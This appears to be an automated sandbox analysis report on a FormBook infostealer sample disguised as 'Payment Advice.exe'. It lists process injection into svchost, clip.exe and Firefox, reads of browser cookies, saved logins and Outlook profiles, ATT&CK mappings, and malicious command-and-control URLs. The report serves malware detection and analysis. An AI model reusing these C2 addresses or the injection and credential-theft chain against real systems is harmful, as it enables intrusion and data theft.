Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtReadVirtualMemory: Direct from: 0x76F02E8C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtCreateKey: Direct from: 0x76F02C6C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtSetInformationThread: Direct from: 0x76F02B4C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtQueryAttributesFile: Direct from: 0x76F02E6C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtAllocateVirtualMemory: Direct from: 0x76F048EC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtQuerySystemInformation: Direct from: 0x76F048CC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtQueryVolumeInformationFile: Direct from: 0x76F02F2C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtOpenSection: Direct from: 0x76F02E0C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtSetInformationThread: Direct from: 0x76EF63F9	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtDeviceIoControlFile: Direct from: 0x76F02AEC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BEC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtCreateFile: Direct from: 0x76F02FEC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtOpenFile: Direct from: 0x76F02DCC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtQueryInformationToken: Direct from: 0x76F02CAC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtTerminateThread: Direct from: 0x76F02FCC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtProtectVirtualMemory: Direct from: 0x76EF7B2E	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtOpenKeyEx: Direct from: 0x76F02B9C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtProtectVirtualMemory: Direct from: 0x76F02F9C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtSetInformationProcess: Direct from: 0x76F02C5C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtNotifyChangeKey: Direct from: 0x76F03C2C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtCreateMutant: Direct from: 0x76F035CC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtWriteVirtualMemory: Direct from: 0x76F02E3C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtMapViewOfSection: Direct from: 0x76F02D1C	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtResumeThread: Direct from: 0x76F036AC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtReadFile: Direct from: 0x76F02ADC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtDelayExecution: Direct from: 0x76F02DDC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtQueryInformationProcess: Direct from: 0x76F02C26	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtResumeThread: Direct from: 0x76F02FBC	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	NtCreateUserProcess: Direct from: 0x76F0371C	Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Section loaded: NULL target: C:\Windows\SysWOW64\clip.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write	Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread register set: target process: 5780

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\clip.exe

Thread APC queued: target process: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Payment Advice.exe

Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A26008

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005BB106 LogonUserW,

0_2_005BB106

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_00583D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00583D19

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C411C SendInput,keybd_event,

0_2_005C411C

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C74E7 mouse_event,

0_2_005C74E7

Source: C:\Users\user\Desktop\Payment Advice.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Advice.exe"	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice.exe

0_2_005BA66C

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C71FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_005C71FA

Source: Payment Advice.exe, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099577629.0000000001831000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000000.1747563059.0000000001830000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099577629.0000000001831000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000000.1747563059.0000000001830000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4099782957.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: Payment Advice.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099577629.0000000001831000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000000.1747563059.0000000001830000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4099782957.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000002.4099577629.0000000001831000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000002.00000000.1747563059.0000000001830000.00000002.00000001.00040000.00000000.sdmp, dBVLdSQhZzWNZhLripbAYBQQRtfM.exe, 00000005.00000002.4099782957.0000000000E51000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005A65C4 cpuid

0_2_005A65C4

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005D091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,

0_2_005D091D

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005FB340 GetUserNameW,

0_2_005FB340

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005B1E95 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,

0_2_005B1E95

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_0059DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_0059DDC0

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\clip.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Source: Payment Advice.exe	Binary or memory string: WIN_81
Source: Payment Advice.exe	Binary or memory string: WIN_XP
Source: Payment Advice.exe	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: Payment Advice.exe	Binary or memory string: WIN_XPe
Source: Payment Advice.exe	Binary or memory string: WIN_VISTA
Source: Payment Advice.exe	Binary or memory string: WIN_7
Source: Payment Advice.exe	Binary or memory string: WIN_8

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D8C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,		0_2_005D8C4F
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005D923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_005D923B

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	2 Valid Accounts	1 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	4 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	2 Valid Accounts	1 Abuse Elevation Control Mechanism	1 Deobfuscate/Decode Files or Information	21 Input Capture	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Abuse Elevation Control Mechanism	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	2 Valid Accounts	3 Obfuscated Files or Information	NTDS	116 System Information Discovery	Distributed Component Object Model	21 Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Access Token Manipulation	1 DLL Side-Loading	LSA Secrets	151 Security Software Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	412 Process Injection	2 Valid Accounts	Cached Domain Credentials	2 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	3 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	21 Access Token Manipulation	Proc Filesystem	11 Application Window Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	412 Process Injection	/etc/passwd and /etc/shadow	1 System Owner/User Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Advice.exe	16%	ReversingLabs	Win32.Trojan.AutoitInject
Payment Advice.exe	23%	Virustotal		Browse
Payment Advice.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
www.sandranoll.com	11%	Virustotal	Browse
www.dmtxwuatbz.cc	2%	Virustotal	Browse
www.xn--matfrmn-jxa4m.se	0%	Virustotal	Browse
www.catherineviskadi.com	1%	Virustotal	Browse
www.anuts.top	7%	Virustotal	Browse
parkingpage.namecheap.com	0%	Virustotal	Browse
www.bfiworkerscomp.com	0%	Virustotal	Browse
www.telwisey.info	2%	Virustotal	Browse
www.hprlz.cz	1%	Virustotal	Browse
www.xn--fhq1c541j0zr.com	0%	Virustotal	Browse
www.gipsytroya.com	8%	Virustotal	Browse
www.hatercoin.online	2%	Virustotal	Browse
www.helpers-lion.online	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Avira URL Cloud	safe
http://www.dmtxwuatbz.cc/lfkn/?kbRxoVY0=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&DnUL=_290s	0%	Avira URL Cloud	safe
https://customerservice.web.com/prweb/PRAuth/app/WebKM_/JfLhd8LVz0a16-h3GqsHOCqqFky5N_vd	0%	Virustotal		Browse
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-72.png	0%	Avira URL Cloud	safe
https://dts.gnpge.com	0%	Virustotal		Browse
http://www.telwisey.info/ei85/?kbRxoVY0=ORmqfURBt40sHMHMpa9bONKIG0NKJL7I9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXnSdkLDuG3HSn8XcjXW0hCgpfinKrOJZMnTQ=&DnUL=_290s	0%	Avira URL Cloud	safe
http://www.bfiworkerscomp.com/xzzi/	0%	Virustotal		Browse
http://www.xn--fhq1c541j0zr.com/rm91/?DnUL=_290s&kbRxoVY0=jSd7r+67+N1qAQkwJvt+iUxfFwvrPy4ZQchR8WhIexhCyQiFJMwmzlR6zVHzfOVMvsfcwBywDpFhuhrgfB+WG8UhwnSvsDBe28fizd0dRyqF3cPtSZfQjsU=	0%	Avira URL Cloud	safe
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	0%	Avira URL Cloud	safe
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Avira URL Cloud	safe
http://www.catherineviskadi.com/qe66/?kbRxoVY0=dnvLceXALBk3Hr4+RUpDuj1gE1lZ37++NG0MGchlNc+FfqCdFLzpUNQMmrv30qtrBi93uCjMcFA24SebHgOv/zqChZDwQ/s0nTN9cl2J79+sQIZRijKLgDM=&DnUL=_290s	0%	Avira URL Cloud	safe
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css	0%	Virustotal		Browse
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Avira URL Cloud	safe
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	0%	Avira URL Cloud	safe
https://static.loopia.se/responsive/images/iOS-72.png	0%	Virustotal		Browse
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png	0%	Virustotal		Browse
https://www.hprlz.cz/w6qg/?DnUL=_290s&kbRxoVY0=0lpTRQcDUH	0%	Avira URL Cloud	safe
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Avira URL Cloud	safe
http://www.xn--fhq1c541j0zr.com/rm91/	0%	Virustotal		Browse
http://www.dmtxwuatbz.cc/lfkn/	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/logo/logo-loopia-white.svg	0%	Virustotal		Browse
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe	1%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/?kbRxoVY0=zHiAY6EG+HxIxFu9b4tfleXF6yb9aKgM+W8Rr/tGfSzDPDxggLk9FyyADeImH3/ZYgS5WMd+vNhhyXlbnciywdLjC/RTAaKLEzmduXRfLlKkNxNmYFq4qCQ=&DnUL=_290s	100%	Avira URL Cloud	malware
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking	1%	Virustotal		Browse
http://www.sandranoll.com/aroo/	100%	Avira URL Cloud	malware
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw	1%	Virustotal		Browse
https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png	0%	Avira URL Cloud	safe
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park	0%	Virustotal		Browse
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Avira URL Cloud	safe
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/	100%	Avira URL Cloud	malware
http://www.bfiworkerscomp.com/xzzi/?DnUL=_290s&kbRxoVY0=9CTSfwlM5YWl8fvbrbSkFth60mtnncbW1FpC9VokAvwkUHOJycf2DDxLp9tWLELwEKEPfCC2oiLqmqE9jQi/S4FmCg8fmWLidol7jMU2H7Flt+5ZogJ/ZG4=	0%	Avira URL Cloud	safe
https://www.domaintechnik.at/fileadmin/gfx/icons/sslserver.png	0%	Virustotal		Browse
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css	0%	Virustotal		Browse
http://www.anuts.top/li0t/?DnUL=_290s&kbRxoVY0=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=	0%	Avira URL Cloud	safe
http://www.sandranoll.com/aroo/?DnUL=_290s&kbRxoVY0=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=	100%	Avira URL Cloud	malware
https://static.loopia.se/shared/style/2022-extra-pages.css	0%	Virustotal		Browse
http://www.xn--matfrmn-jxa4m.se/4hda/	100%	Avira URL Cloud	malware
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp	0%	Virustotal		Browse
https://static.loopia.se/responsive/images/iOS-114.png	0%	Avira URL Cloud	safe
http://www.gipsytroya.com/tf44/	7%	Virustotal		Browse
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://www.networksolutions.com/	0%	Avira URL Cloud	safe
http://www.telwisey.info/ei85/	0%	Avira URL Cloud	safe
http://www.xn--matfrmn-jxa4m.se/4hda/	0%	Virustotal		Browse
